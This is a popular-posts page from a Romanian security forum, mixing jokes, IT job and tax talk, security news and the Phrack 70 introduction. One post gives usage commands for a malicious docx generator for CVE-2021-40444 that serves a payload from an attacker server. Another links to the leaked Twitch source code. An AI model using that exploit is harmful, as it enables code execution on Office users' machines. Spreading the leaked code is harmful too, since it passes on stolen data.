Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation since 09/18/21 in all areas

  1. Eu am dezvoltat un bruteforcer cuantic care ruleaza pe blockchain si foloseste artificial intelligence ca sa obtina acces la servere de pe glob. E privat. Din fericire nu trebuie compilat, e scris in PHP.
    6 points
  2. Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCE.md for manual reproduce steps If your generated cab is not working, try pointing out exploit.html URL to calc.cab Using First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system() python3 exploit.py generate test/calc.dll http://<SRV IP> Once you generate the malicious docx (will be at out/) you can setup the server: sudo python3 exploit.py host 80 Finally try the docx in a Windows Virtual Machine: Download Link : https://github.com/lockedbyte/CVE-2021-40444
    6 points
  3. Da, cand isi vinde @Zatarra masina o sa puna in anunt: "Condusa de un batranel pana la data-center si inapoi".
    5 points
  4. Ironic... Acum câteva zile ți-a zis cineva efevtiv de win+L... Of ce trece timpul
    5 points
  5. Sa zicem ca vrei sa iti faci un site unicat cum nu mai exista pe internet la ora actuala dar, ca sa nu folosesti functii php sau Python de exemplu (in caz ca folosesti Django) fiindca nu vrei sa rupi serverul si sa fie mai tot timpul picat din cauza a foarte putini utilizatori, te gandesti la ceva gen Javascript care practic este Clent Side si fiecare viziator/utilizator isi foloseste propriul browser pentru a utiliza diverse functii oferite de site. Problema cu Javascript este ca oricare daca se pricepe (si nu-i neaparat greu) iti poate lua functiile din javascript si sa le foloseasca dupa cum doreste in propriile lui aplicatii sau chiar sa le converteasca in C++ ca limbajele sunt oarecum asemanatoare si sa faca aplicatii pe baza codului tau sursa asta dupa tu ce ti-ai stors creierii si nervii sau poate ai dat bani unui programator sa-ti faca ceva frumos asa cum vrei tu. Exista un soi de obfuscare in Javascript dar am inteles ca se poate decoda la loc si rezulta codul original. Ce altceva s-a putea folosi care sa fie client side dar codul sa fie protejat si sa nu poata fi furat de utilizatorii sitului (sau citit si creat exploituri dupa el) ? Multumesc mult de tot!
    5 points
  6. Apache has issued patches to address two security vulnerabilities, including a path traversal and file disclosure flaw in its HTTP server that it said is being actively exploited in the wild. "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root," the open-source project maintainers noted in an advisory published Tuesday. "If files outside of the document root are not protected by 'require all denied' these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts." The flaw, tracked as CVE-2021-41773, affects only Apache HTTP server version 2.4.49. Ash Daulton and cPanel Security Team have been credited with discovering and reporting the issue on September 29, 2021. Source: PT SWARM Also resolved by Apache is a null pointer dereference vulnerability observed during processing HTTP/2 requests (CVE-2021-41524), thus allowing an adversary to perform a denial-of-service (DoS) attack on the server. The non-profit corporation said the weakness was introduced in version 2.4.49. Apache users are highly recommended to patch as soon as possible to contain the path traversal vulnerability and mitigate any risk associated with active exploitation of the flaw. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. https://securityaffairs.co/wordpress/122999/hacking/apache-zero-day-flaw.html
    4 points
  7. Pe BGP au avut necazuri. Nu aparea nimic pe ASN-ul lor routat. Providerii de internet au avut ceva necazuri din cauza numarului enorm de cereri (DNS, HTTPS). Sunt aplicatii, jocuri, browsere si sute de milioane de oameni fara viata ce stau pe fb si o freaca dubios. Oricum, la mai mare ♥️
    4 points
  8. SRI nu mai are timp. Sunt prinsi intr-o combinatie pe tigari netimbrate
    4 points
  9. Pe desktop cred ca ai setare in bios cu "power on after power failure" sau ceva de genul. Nu stiu insa daca ai pe laptop asa ceva. Sau prinde cu banda dublu adeziva un electromagnet de la un releu cu impuls de butonul de power. Cand vine curentul, iti apasa ala butonul
    3 points
  10. https://trenduri.blogspot.com/2021/10/anatomia-crizei-care-vine.html
    3 points
  11. Prin parcuri ,la șah ! 😁 Va salut și eu ,pe toți !
    3 points
  12. Microsoft Office Word RCE Exploit
    3 points
  13. Ministrul Finanțelor, Dan Vîlceanu, a anunțat marți că are în lucru varianta eliminării excepțiilor de la plata impozitului și a contribuțiilor pe venit în domenii precum IT-ul, cercetarea și construcțiile. Într-un interviu pentru Antena 3 dacă guvernul va mări TVA în 2022, ministrul Dan Vîlceanu a spus: ”Exclus să creștem TVA. Dar există o discuție legată de excepții la plata impozitului pe venit și plata contribuțiilor”. Întrebat dacă e vorba despre salariații din IT, cercetare și construcții, Vîlceanu a spus că ”sunt mai multe categorii. Toate excepțiile de la plata impozitului pe venit și la plata contribuțiilor pe venit, plus excepțiile la plata impozitelor și taxelor locale, sunt undeva la 3% din PIB. E o sumă foarte mare. Este o chestiune de echitate, corectitudine. Unii plătesc, alții nu (…) Este o variantă, mă refer la toate excepțiile. De altfel avem și critici din partea Comisiei și altor organisme internaționale”. El a mai spus că o eventuală decizie va fi luată după discuții cu reprezentanții sectoarelor respective: ”Toate lucrurile trebuie discutate înainte. Nu suntem adepții unei politici impuse, discutăm cu industria și apoi vedem”. Ministrul Vîlceanu a mai anunțat că guvernul va modifica modul în care sunt evaluate imobilele pentru care se plătesc taxe locale pentru că acum valoarea de impozitare ar fi prea mică față de valoarea de piață. ”Vom umbla la modul cum e calculată valoarea clădirilor impozitate”, a spus Vîlceanu, admițând că unii proprietari vor plăti mai mult în urma acestei schimbări. Sursa foto: Inquam Photos / Ilona Andrei Sursa: https://economedia.ro/breaking-ministrul-finantelor-ia-in-calcul-eliminarea-scutirii-de-la-plata-impozitului-pe-venit-si-a-contributiilor-in-domeniile-it-constructii-si-cercetare-e-o-chestiune-de-echitate-corec.html
    3 points
  14. Esti daatdraqq, unde umblii ? Salutari la pensionari!
    3 points
  15. 3 points
  16. Se pare ca aici sunt mai multe informatii: https://cert.ro/pagini/auditori-de-securitate-cibernetica
    3 points
  17. Buna, e foarte interesant topicul asa ca voi spune punctul meu de vedere. Nu am experienta in recrutare, dar am tinut sute de interviuri pe domeniul tehnic deci am o oarecare experienta cu acest proces + sunt cautat pentru foarte multe joburi si la 95% din ele nici macar nu raspund. Problema sta in felul urmator: - Un developer in Romania este foarte bine platit, mai ales unul bun cu experienta care lucreaza afara ia cu usurinta peste 5k euro. Daca tu ca recruiter abordezi un astfel de developer el te va ignora instant din 2 motive simple: 1. Comodidatea facea ca majoritatea sa nu caute ceva nou daca sunt multumiti de jobul curent 2. Daca salariul sau alte beneficii uber-mega-extra rentabile nu sunt enuntate in abordare cu siguranta mesajul nu ii va starni nici un interes, mai ales prin simplul fapt ca va fi unul din 200 (sau mai multe) De aceea, sfatul meu este urmatorul: Cel mai probabil, in functie de proiect/client se stie si bugetul. Incercati sa targetati oameni care sunt dispusi sa lucreze pentru suma de care dispuneti. Acest lucru este foarte important. Cu alte cuvinte vei avea mult mai multe sanse sa prinzi un om cu experienta putina dar foarte pasionat si talentat care ste dispus sa lucreze pentru sa zicem un 3k euro, decat unul care are deja pe undeva pe la 5k euro si nu il intereseaza nimic altceva. Ai putea sa vii cu un contraargument gen: Da, dar la firma noastra se lucreaza cu tehnologia X sau Y (nu-l intereseaza, poate sa o invete in max 1 sapt cu putin efort). Da, dar la firma noastra e o echipa foarte tanara si cool (foarte putin probabil sa-l intereseze, daca urmarea asa ceva era cu siguranta intr-un loc de genul deja deoarece vroia el sa fie, deci cauta el jobu sau arata interes mare pentru cei care deja l-au abordat). Si tot asa. Sincer este o perioada foarte ciudata. Intreaga piata de IT are nevoie de oameni, majoritatea sunt foarte pretentiosi deoarece cererea e enorma. Se merge din ce in ce mai mult pe lansare oamenilor in IT din diferite domenii, deoarece acestia sunt dispusi sa lucreze pe o suma mai mica timp de 2-3 ani, apoi sa se lanseze, gen sa dubleze sau tripleze veniturile prin simpla schimbare de job. La toate astea se adauga si pandemia, care a facut ca toti sa lucram de acasa, fapt care devine cerut din ce in ce mai mult de candidati. Sper sa te ajute acest feedback. Sunt curios ce spun si ceilalti useri. Multa bafta iti doresc mai departe si sper sa gasesti oameni faini
    3 points
  18. Suntem toti muritori e foame, sclavii mariilor corporatii. Nici acum nu stim sa compilam ceva in C sau sa scriem cateva linii in piton, dar toti dormim linistiti noaptea si suntem impacati cu idea ca avem un pateu sa punem pe masa si reusim sa strangem ceva malai sa mergem in Grecia intr-un conceiu. Mariile corporatii va sunt reunosatoare ca ati revolutionat internetul cu scanerele voastre SSH. ? scanner ? scanner unixcod
    2 points
  19. Ar fi frumos sa strangem undeva astfel de amintiri.
    2 points
  20. Pandora papers: biggest ever leak of offshore data exposes financial secrets of rich and powerful https://www.theguardian.com/news/2021/oct/03/pandora-papers-biggest-ever-leak-of-offshore-data-exposes-financial-secrets-of-rich-and-powerful The secret deals and hidden assets of some of the world’s richest and most powerful people have been revealed in the biggest trove of leaked offshore data in history. Branded the Pandora papers, the cache includes 11.9m files from companies hired by wealthy clients to create offshore structures and trusts in tax havens such as Panama, Dubai, Monaco, Switzerland and the Cayman Islands. They expose the secret offshore affairs of 35 world leaders, including current and former presidents, prime ministers and heads of state. They also shine a light on the secret finances of more than 300 other public officials such as government ministers, judges, mayors and military generals in more than 90 countries. The files include disclosures about major donors to the Conservative party, raising difficult questions for Boris Johnson as his party meets for its annual conference. More than 100 billionaires feature in the leaked data, as well as celebrities, rock stars and business leaders. Many use shell companies to hold luxury items such as property and yachts, as well as incognito bank accounts. There is even art ranging from looted Cambodian antiquities to paintings by Picasso and murals by Banksy. The Pandora papers reveal the inner workings of what is a shadow financial world, providing a rare window into the hidden operations of a global offshore economy that enables some of the world’s richest people to hide their wealth and in some cases pay little or no tax. What are the Pandora papers? There are emails, memos, incorporation records, share certificates, compliance reports and complex diagrams showing labyrinthine corporate structures. Often, they allow the true owners of opaque shell companies to be identified for the first time. The files were leaked to the International Consortium of Investigative Journalists (ICIJ) in Washington. It shared access to the leaked data with select media partners including the Guardian, BBC Panorama, Le Monde and the Washington Post. More than 600 journalists have sifted through the files as part of a massive global investigation. The Pandora papers represent the latest – and largest in terms of data volume – in a series of major leaks of financial data that have convulsed the offshore world since 2013. Setting up or benefiting from offshore entities is not itself illegal, and in some cases people may have legitimate reasons, such as security, for doing so. But the secrecy offered by tax havens has at times proven attractive to tax evaders, fraudsters and money launderers, some of whom are exposed in the files. Other wealthy individuals and companies stash their assets offshore to avoid paying tax elsewhere, a legal activity estimated to cost governments billions in lost revenues. After more than 18 months analysing the data in the public interest, the Guardian and other media outlets will publish their findings over the coming days, beginning with revelations about the offshore financial affairs of some of the most powerful political leaders in the world. They include the ruler of Jordan, King Abdullah II, who, leaked documents reveal, has amassed a secret $100m property empire spanning Malibu, Washington and London. The king declined to answer specific questions but said there would be nothing improper about him owning properties via offshore companies. Jordan appeared to have blocked the ICIJ website on Sunday, hours before the Pandora papers launched. The files also show that Azerbaijan’s ruling Aliyev family has traded close to £400m of UK property in recent years. One of their properties was sold to the Queen’s crown estate, which is now looking into how it came to pay £67m to a company that operated as a front for the family that runs a country routinely accused of corruption. The Aliyevs declined to comment. The Pandora papers also threaten to cause political upsets for two European Union leaders. The prime minister of the Czech republic, Andrej Babiš, who is up for election this week, is facing questions over why he used an offshore investment company to acquire a $22m chateau in the south of France. He too declined to comment. And in Cyprus, itself a controversial offshore centre, the president, Nicos Anastasiades, may be asked to explain why a law firm he founded was accused of hiding the assets of a controversial Russian billionaire behind fake company owners. The firm denies any wrongdoing, while the Cypriot president says he ceased having an active role in its affairs after becoming leader of the opposition in 1997. Not everyone named in the Pandora papers is accused of wrongdoing. The leaked files reveals that Tony and Cherie Blair saved £312,000 in property taxes when they purchased a London building partially owned by the family of a prominent Bahraini minister. The former prime minister and his wife bought the £6.5m office in Marylebone by acquiring a British Virgin Islands (BVI) offshore company. While the move was not illegal, and there is no evidence the Blairs proactively sought to avoid property taxes, the deal highlights a loophole that has enabled wealthy property owners not to pay a tax that is commonplace for ordinary Britons. The leaked records vividly illustrate the central coordinating role London plays in the murky offshore world. The UK capital is home to wealth managers, law firms, company formation agents and accountants. All exist to serve their ultra-rich clients. Many are foreign-born tycoons who enjoy “non-domicile” status, which means they pay no tax on their overseas assets. Ukraine’s president, Volodymyr Zelenskiy, who was elected in 2019 on a pledge to clean up his country’s notoriously corrupt and oligarch-influenced economy, is also named in the leak. During the campaign, Zelenskiy transferred his 25% stake in an offshore company to a close friend who now works as the president’s top adviser, the files suggest. Zelenskiy declined to comment and it is unclear if he remains a beneficiary. The Russian president, Vladimir Putin, whom the US suspects of having a secret fortune, does not appear in the files by name. But numerous close associates do, including his best friend from childhood – the late Petr Kolbin – whom critics have called a “wallet” for Putin’s own wealth, and a woman the Russian leader was allegedly once romantically involved with. None responded to invitations to comment. The Pandora papers also place a revealing spotlight on the offshore system itself. In a development likely to prove embarrassing for the US president, Joe Biden, who has pledged to lead efforts internationally to bring transparency to the global financial system, the US emerges from the leak as a leading tax haven. The files suggest the state of South Dakota, in particular, is sheltering billions of dollars in wealth linked to individuals previously accused of serious financial crimes. The offshore trail also stretches from Africa to Latin America to Asia, and is likely to pose difficult questions for politicians across the world. In Pakistan, Moonis Elahi, a prominent minister in prime minister Imran Khan’s government, contacted an offshore provider in Singapore about investing $33.7m. In Kenya, the president, Uhuru Kenyatta, has portrayed himself as an enemy of corruption. In 2018, Kenyatta told the BBC: “Every public servant’s assets must be declared publicly so that people can question and ask: what is legitimate?” He will come under pressure to explain why he and his close relatives amassed more than $30m of offshore wealth, including property in London. Kenyatta did not respond to enquiries about whether his family wealth was declared to relevant authorities in Kenya. The Pandora papers also reveal some of the unseen repercussions of previous offshore leaks, which spurred modest reforms in some parts of the world, such as the BVI, which now keeps a record of the real owners of companies registered there. However, the newly leaked data shows money shifting around offshore destinations, as wealthy clients and their advisers adjust to new realities. Some clients of Mossack Fonseca, the now defunct law firm at the heart of the 2016 Panama papers disclosures, simply transferred their companies to rival providers such as another global trust and corporate administrator with a major office in London, whose data is in the new trove of leaked files. Asked why he was migrating the new company, one customer wrote bluntly: “Business decision to exit following the Panama papers.” Another agent said the industry had always “adapted” to external pressure. Some leaked files appear to show some in the industry seeking to circumvent new privacy regulations. One Swiss lawyer refused to email the names of his high-value customers to a service provider in the BVI, following new legislation. Instead, he sent them by airmail, with strict instructions they should not be processed in any “electronic way”. The identity of another beneficial owner was shared via WhatsApp. “The purpose of this way to proceed is to enable you to comply with BVI rules,” the lawyer wrote. Referring to Mossack Fonseca, the lawyer added: “You are obliged to keep secrecy for our clients and to not make feasible at all a second ‘Panama papers’ story that happened to one of your competitors.” Gerard Ryle, the director of the ICIJ, said leading politicians who organised their finances in tax havens had a stake in the status quo, and were likely to be an obstacle to reform of the offshore economy. “When you have world leaders, when you have politicians, when you have public officials, all using the secrecy and all using this world, then I don’t think we’re going to see an end to it.” He expected the Pandora papers to have a greater impact than previous leaks, not least because they were arriving in the middle of a pandemic that had exacerbated inequalities and forced governments to borrow unprecedented amounts to be shouldered by ordinary taxpayers. “This is the Panama papers on steroids,” Ryle said. “It’s broader, richer and has more detail.” At least $11.3tn in wealth is held offshore, according to a 2020 study by the Paris-based Organisation for Economic Co-operation and Development (OECD). “This is money that is being lost to treasuries around the world and money that could be used to recover from Covid,” Ryle said. “We’re losing out because some people are gaining. It’s as simple as that. It’s a very simple transaction that’s going on. The Pandora papers reveal the inner workings of what is a shadow financial world, providing a rare window into the hidden operations of a global offshore economy. Illustration: Guardian Design Millions of documents reveal offshore deals and assets of more than 100 billionaires, 30 world leaders and 300 public officials
    2 points
  21. Ba ce hater. De ce nu :)). Oricum Nytro e sefu la platforme dar la ce varsta avem, zi mersi ca mai putem tasta
    2 points
  22. ==Phrack Inc.== Volume 0x10, Issue 0x46, Phile #0x01 of 0x0f |=-----------------------------------------------------------------------=| |=-------------------------=[ Introduction ]=----------------------------=| |=-----------------------------------------------------------------------=| |=----------------------=[ Phrack Staff ]=-------------------------=| |=-----------------------=[ staff@phrack.org ]=--------------------------=| |=-----------------------------------------------------------------------=| |=-----------------------[ October 5, 2021 ]=-------------------------=| |=-----------------------------------------------------------------------=| --[ Introduction Phrack! We're back! It was only five years ago that issue 0x45 was released. It may sound bad, but it is also, indeed, quite bad. Issue 0x45 was released four years after issue 0x44. And we are now five years after that. Just trying to set the context here. The world is so different and so many things have happened in these five years that it makes no sense trying to make any point. Phrack has always been a reflection of the hacking community, and guess what, the community is moving away from itself. By this we don't mean that there are no talented hackers, because there most definitely are (just take a look at our authors). We also don't mean that there is no exquisite public hacking, because there is (again, our articles as proof). However, there is a clear move away from the collective hacking mindset that was most prevalent in the past. The word "scene" brings only smirks to people's faces. There are many reasons for this, and we are all to blame [1]. So where is the community right now, and, most importantly, where is it going? We are all ego-driven, more so nowadays we would argue, and this has definitely made collectives much harder to thrive. We expect direct payback from our hacking, in many forms, including reputation. While it was quite common to receive anonymous papers, in the past five years we got almost none. Where is the new Malloc Maleficarum? Quality isn't the question here, we have high quality hacking, we covered that. The question is about the community and how it has changed in the last 10-15 years. And about Phrack. Phrack started as a community zine of exchanging technical information and hacking techniques in a time that it was hard to find it. It later changed. It became a symbol of achievement, eliteness, and honor to be published in Phrack. A slight but significant change happened afterwards. Phrack gravitated (willingly or not is the subject of another discussion) towards an academic medium. Academia noticed the high quality of Phrack papers, started citing them, and basing their offensive and defensive work on them. Did that alienate the underground that Phrack represented for so many years? Yes, we think it did. But the underground also changed. Some of it became involved in malware, spyware, and also the "infosec" industry. And this mutated the underground. Of course we don't judge. Shouldn't Phrack be the reflection of the community, whatever the community is? Or should Phrack be a beacon of the old school underground? Well, it remains to be seen. Phrack will always be alive as long as the community is alive, reflecting it. If the hacking community becomes "infosec" in its majority, then probably so will Phrack. If the heart of the community is CTF, Phrack will reflect that. If the community focuses on malware, so will Phrack. Isn't that what Phrack has always done? It always was and always will be "by the community, for the community". If the community has decided that Phrack has a five year release cycle, then that's where we are. Unfortunately, this issue is again an issue of eulogies; we have lost hackers that have had an enormous impact on our community. Phrack would like to say goodbye to them. Their loss saddens us deeply, and makes our community poorer in talent, ethics, and intellect. We also mourn lost communities. Segfault.net has been our home/hosting in the past and is now gone. But we also have some good news! You might have come across Phrack merchandise [2], well, yes, we have resurrected it! The original 2003 art work has been found on a backup drive. All profits go to the Electronic Frontier Foundation. The EFF is a rare example of good and simple advise for the ordinary citizens. Plus a defender of our rights online and of the freedom of information. A beacon of light to say the least. The EFF used to run one of the three FTP servers to download Phrack as well. And let's not forget that the EFF paid for the attorney of Phrack's co-founder Knight Lightning in the 1990 court case and supported him all the way. They defended against the US Secret Service, a ruthless adversary with no respect for the freedom of information or the hacking scene in general. With EFF's help the case against Knight Lighting collapsed and the US Secret Service looked like a pissed on poodle. The merchandise has the Phrack Gnome on the front and the Hacker's Manifesto on the back. And ships worldwide. [1] http://www.phrack.org/issues/69/6.html [2] https://phrack.myspreadshop.co.uk/ $ cat p70/index.txt --[ Table of contents 0x01 Introduction ........................................ Phrack Staff 0x02 Phrack Prophile on xerub ............................ Phrack Staff 0x03 Attacking JavaScript Engines: A case study of JavaScriptCore and CVE-2016-4622 .................... saelo 0x04 Cyber Grand Shellphish .............................. Team Shellphish 0x05 VM escape - QEMU Case Study ......................... Mehdi Talbi & Paul Fariello 0x06 .NET Instrumentation via MSIL bytecode injection .... Antonio 's4tan' Parata 0x07 Twenty years of Escaping the Java Sandbox ........... Ieu Eauvidoum & disk noise 0x08 Viewer Discretion Advised: (De)coding an iOS Kernel Vulnerability ................................ Adam Donenfeld 0x09 Exploiting Logic Bugs in JavaScript JIT Engines ..... saelo 0x0a Hypervisor Necromancy; Reanimating Kernel Protectors .......................................... Aris Thallas 0x0b Tale of two hypervisor bugs - Escaping from FreeBSD bhyve ....................................... Reno Robert 0x0c The Bear in the Arena ............................... xerub 0x0d Exploiting a Format String Bug in Solaris CDE ....... Marco Ivaldi 0x0e Segfault.net eulogy ................................. skyper 0x0f YouTube Security Scene .............................. LiveOverflow --[ Greetz - dakami: pure passion for hacking, will be greatly missed - navs: our condolences for this brilliant hacker - accepted authors: thanks for your work, you keep Phrack alive - rejected authors: we hope our reviews helped you in some way - past Phrack Staff members: now we know ;) --[ Phrack policy phrack:~# head -77 /usr/include/std-disclaimer.h /* * All information in Phrack Magazine is, to the best of the ability of * the editors and contributors, truthful and accurate. When possible, * all facts are checked, all code is compiled. However, we are not * omniscient (hell, we don't even get paid). It is entirely possible * something contained within this publication is incorrect in some way. * If this is the case, please drop us some email so that we can correct * it in a future issue. * * * Also, keep in mind that Phrack Magazine accepts no responsibility for * the entirely stupid (or illegal) things people may do with the * information contained herein. Phrack is a compendium of knowledge, * wisdom, wit, and sass. We neither advocate, condone nor participate * in any sort of illicit behavior. But we will sit back and watch. * * * Lastly, it bears mentioning that the opinions that may be expressed in * the articles of Phrack Magazine are intellectual property of their * authors. * These opinions do not necessarily represent those of the Phrack Staff. */ ----( Contact )---- < Editors : staff[at]phrack{dot}org > > Submissions : staff[at]phrack{dot}org < Submissions may be encrypted with the following PGP key: (Hint #1: Always use the PGP key from the latest issue) (Hint #2: ANTISPAM in the subject or face the mighty /dev/null demon) Link: http://www.phrack.org/issues/70/1.html#article ❤️
    2 points
  23. Am sperat ca vad un link cu download...mi se pare genial ca source code a fost leaked. Oportunitatea de a citi cod de productie fara sa te angajezi la twitch Link-ul pt leak: https://ghostbin.com/2vU1I
    2 points
  24. An unknown individual has leaked the source code and business data of video streaming platform Twitch via a torrent file posted on the 4chan discussion board earlier today. The leaker said they shared the data as a response to the recent “hate raids” —coordinated bot attacks posting hateful and abusive content in Twitch chats— that have plagued the platform’s top streamers over the summer. “Their community is […] a disgusting toxic cesspool, so to foster more disruption and competition in the online video streaming space, we have completely pwned them, and in part one, are releasing the source code from almost 6,000 internal Git repositories,” the leaker said earlier today. The Record has downloaded parts of the 125 GB torrent file shared by the leaker in order to confirm its authenticity. IMAGE: THE RECORD The content of the leak is in tune with what the leaker claimed to have shared earlier today, quoted below: Entirety of Twitch.tv, with commit history going back to its early beginnings Mobile, desktop and video game console Twitch clients Various proprietary SDKs and internal AWS services used by Twitch Every other property that Twitch owns including IGDB and CurseForge An unreleased Steam competitor from Amazon Game Studios Twitch SOC internal red teaming tools (lol) AND: Creator payout reports from 2019 until now. Find out how much your favorite streamer is really making! Among the treasure trove of data, the most sensitive folders are the ones holding information about Twitch’s user identity and authentication mechanisms, admin management tools, and data from Twitch’s internal security team, including white-boarded threat models describing various parts of Twitch’s backend infrastructure [see redacted image below]. IMAGE: THE RECORD IMAGE: THE RECORD While at the time of writing, The Record was unable to find personal details for any Twitch users, the leak also contained payout schemes for the platform’s top streamers, some of which had already confirmed its accuracy [1, 2, 3, 4]. The data, which we will not be linking or sharing in any way, is exposing the monthly revenues for some of the platform’s biggest earners, some of which reach six-figure sums; data that could be a boon for extortionists and criminal groups. A Twitch spokesperson did not immediately return a request for comment regarding today’s leak. The source of the leak is currently believed to be an internal Git server. Git servers are typically used by companies to allow large teams of programmers to make controlled and easily reversible changes to source code repositories. The leak was also labeled as “part one,” suggesting that more data will be leaked in the future. Although no user data was found in the leak, several security researchers have urged users to change their passwords and enable a multi-factor authentication solution for their account as a precaution. The leak comes a month after thousands of Twitch streams organized the #ADayOffTwitch walkout on September 1, refusing to stream in response to the ever-increasing hate raids. In August, Twitch promised to address the hate raids in a message posted on Twitter, asking for patience as the spam attacks did not have “a simple fix.” Article text has been updated with additional screenshots of the leak and confirmations from Twitch streamers. Title and text have updated to remove mention of Anonymous hacker collective as the source of the leak. Source: https://therecord.media/twitch-source-code-and-business-data-leaked-on-4chan/
    2 points
  25. Nu stiu care este treaba dar mai toate dau semne in ultimele ore: Probabil related to: https://mashable.com/video/facebook-leaker-frances-haugen-60-minutes
    2 points
  26. Eu am cumparat primul bilet, deci ne vedem acolo. Pana atunci cred ca mai scade si numarul de cazuri.
    2 points
  27. Șeful ANRE are un salariu de 12.000 de euro. Este IT-st de profesie cum poti sa spui ca nu se castiga bine
    2 points
  28. 1000 de lei vs 10000 dolari, IT-istul român alege 1000 de lei. Nu ii nici un paradis fiscal, ii forta de munca ieftina motivul principal.
    2 points
  29. Toate bune bro. Il pierdusem pe Tex dintr-o zona unde imparteam intre noi mici, cefe de porc, carnati si alte nenorociri la gratar si m-am gandit ca il gasesc aici. Altfel na, m-am uitat si eu in urma mea aici sa vad ce faceam pe vremea aia, sa vad ce personaje mai recunosc etc.
    2 points
  30. COR, un instrument „depășit de realitatea din piață”. Ce meserii nu vor mai exista în România 189 de ocupații încă din Codul ocupațiilor din România (COR) nu se mai practică în prezent și alte 1.787 existente în Clasificarea europeană a aptitudinilor, competențelor, calificărilor și ocupațiilor (ESCO) nu se regăsesc în COR, a explicat Raluca Turcan, ministrul Muncii, într-o postare pe pagina sa Facebook. ... Ce noi meserii vor apărea Totodată, noi ocupații vor fi intoduse în COR și anume: arhitect de interior auditor de securitate cibernetică director pentru relaţia cu investitorii expert în securitate cibernetică. Stirea: https://www.wall-street.ro/articol/Careers/276605/legator-de-par-aburitor-de-pluta-printre-meseriile-care-nu-vor-mai-exista-in-romania.html-amp Asta inseamna ca nu vom mai fi "programatori" in contracte
    2 points
  31. Eu m-am intors in vizita pentru ca il pierdusem pe @aelius Salutari personajelor cu vechime.
    2 points
  32. tu beai laptic cand iti fura pax prajiturile
    2 points
  33. Am experienta de 6 ani in IT si toata experienta mea este pe partea de Network Engineering, asa ca la developer nu stiu ce sfaturi as putea sa dau. Dar pot sa dau un sfat general valabil. Eu de fiecare data cand sunt sunat sa programez un interviu le zic "eu nu vin sub X lei, daca bugetul este sub, nu va mai pierdeti timpul nici voi si nici eu". De obicei, un itist isi da seama de ce salariu va primi urmaring doua lucruri: experienta lui si jd-ul. S-a intamplat sa iau si cu 50% mai mult decat am zis ca e suma minima? Da. Deci ca sa spui suma sub care nu accepti negociere nu inseamna ca acel salariu il doresti. Asa ca va sfatuiesc si pe voi sa fiti transparenti. Traim in 2021, salariul nu mai este un tabu. Nu neaparat suma pe care o oferiti dar bugetul pe care il aveti. Daca voi aveti un buget de 5.000 de euro si candidatul este junior, va sti si el ca nu va lua 5.000 de euro. Dar daca prindeti un senior si dupa 4 interviuri ii spuneti ca aveti un buget de 1.500 de euro, va scuipa in fata. Eu asa as face.
    2 points
  34. Am găsit la un moment dat un trading bot ce trebuia implementat in binance. L-am testat, iar la o investiție de 400$ producea aproximativ 40$/week. O să-l caut si revin cu edit.
    2 points
  35. 90% din astia care ati comentat aici sunteti rupti de realitate. Total. Voi credeti ca toata Romania arata asa cum o vedeti voi cand va duceti in Centrul Vechi in Brasov? Sau cum este in Cluj? Sau in Bucuresti? Duceti-va la 20 de km de orice oras mare, inclusiv Bucuresti si o sa vedeti acolo saracie. Voi aveti habar ca exista oameni care nu au mai mancat carne de ani de zile pentru ca nu isi permit? Copii care nu se pot duce la scoala ca nu au haine? Voi sunteti tara lui Citu, cu crestere economica. Daca esti sarac si nu ai bani de haine, si nu zic haine scumpe, ci sa arati ingrijit, nici nu te lasa sa intri intr-o companie, pentru un interviu. Daca ai un Logan cazut din 2000, nici bariera nu ti-o deschide paznicu. Am fost sa fac vaccinul la Veridia in Bucuresti, clinica privata, prima doza. Si la Spitalul Neghinita rapelul. Spital de stat. Are rost sa va spun unde m-am simtit ca un gunoi? Cati dintre astia de aici ati avut operatii de facut in ultimii ani si ati stat la cozi, pe holuri de spitale, cu firele atarnand in voi? Analizele, unde vi le faceti? La Regina Maria, nu-i asa? Stiti cum e sa te duci de la 3 dimineata in prima zi din luna sa iti faci analizele, pentru ca altfel nu mai prinzi loc la gratuite? Sunt oameni care au platit 50 de ani la asigurarea de sanataet si nu prind locuri la analize. Ba, la analize. Nu vorbesc de operatii pe creier. Daca ma duc sa imi spal masina, se uita cioara aia la mine ca si cum am futut-o pe ma-sa cand ma urc in masina si nu ii dau ciubuc. Am fost cu prietena mea la spital in Medgidia pentru ca i-a intrat un cui in picior la mare si am stat 5 ore. 5 ore ba, sa se uite un medic la ea. Erau unii cu mainile si picioarele rupte, tot 5 ore a durat. Inainte sa ziceti ca o duceti bine si ca va place in tara asta, mai scoateti si voi capu din bula in care traiti, ca daca maine da un handicapat cu masina peste voi pe trecere, o sa muriti ca ultimii caini pana vine ambulanta. Pentru ca unu cu Audi A8 il doare in pula de ambulanta voastra si nu se da la o parte. Si daca nu muriti de masina aluia, va omoara microbii din spital. Ce plm e frumos in tara asta? Ca daca vreau sa ii fac reclamatie veecinului de la 5 ca da muzica tare, daca chem politia si ala a oprit muzica intre timp, eu iau amenda. Daca vreau sa parchez in fata unei cafenele, trebuie sa ma uit stanga-dreapta dupa parcangii, ca altfel ma trezesc cu chei pe masina. Am fost de 100 de ori in pragul unei crize pentru ca eu astept la rand la Auchan/Kaufland si altii se baga in fata mea. Repet, iesiti din bula. Romania nu e salariul de IT-ist, nici colegul corporatist si nici vecinii din Plm Residence. Romania arata diferit. Daca as putea, as da foc la toata tara, inclusiv oamenilor din ea, inclusiv mie. Doar asa tare asta mai are o sansa. Duceti-va in Serbia sau in Macedonia de Nord, tari pe care voi le credeti sub noi, sa vedeti cum se comporta oamenii cu voi la magazine. Cum se comporta aia la primarie cu voi. Am fost in Belgrad sa-mi fac abonament la bicicleta gratuita(Da, ai nevoie de un card pentru sistemul de bicicelete din Belgrad). M-am simtit ca si cum as fi fost fiu de parlamentar in Romania. Am facut programare la 10:50. La 10:45 eram cu cardu in mana. Adica mai devreme cu 5 minute.
    2 points
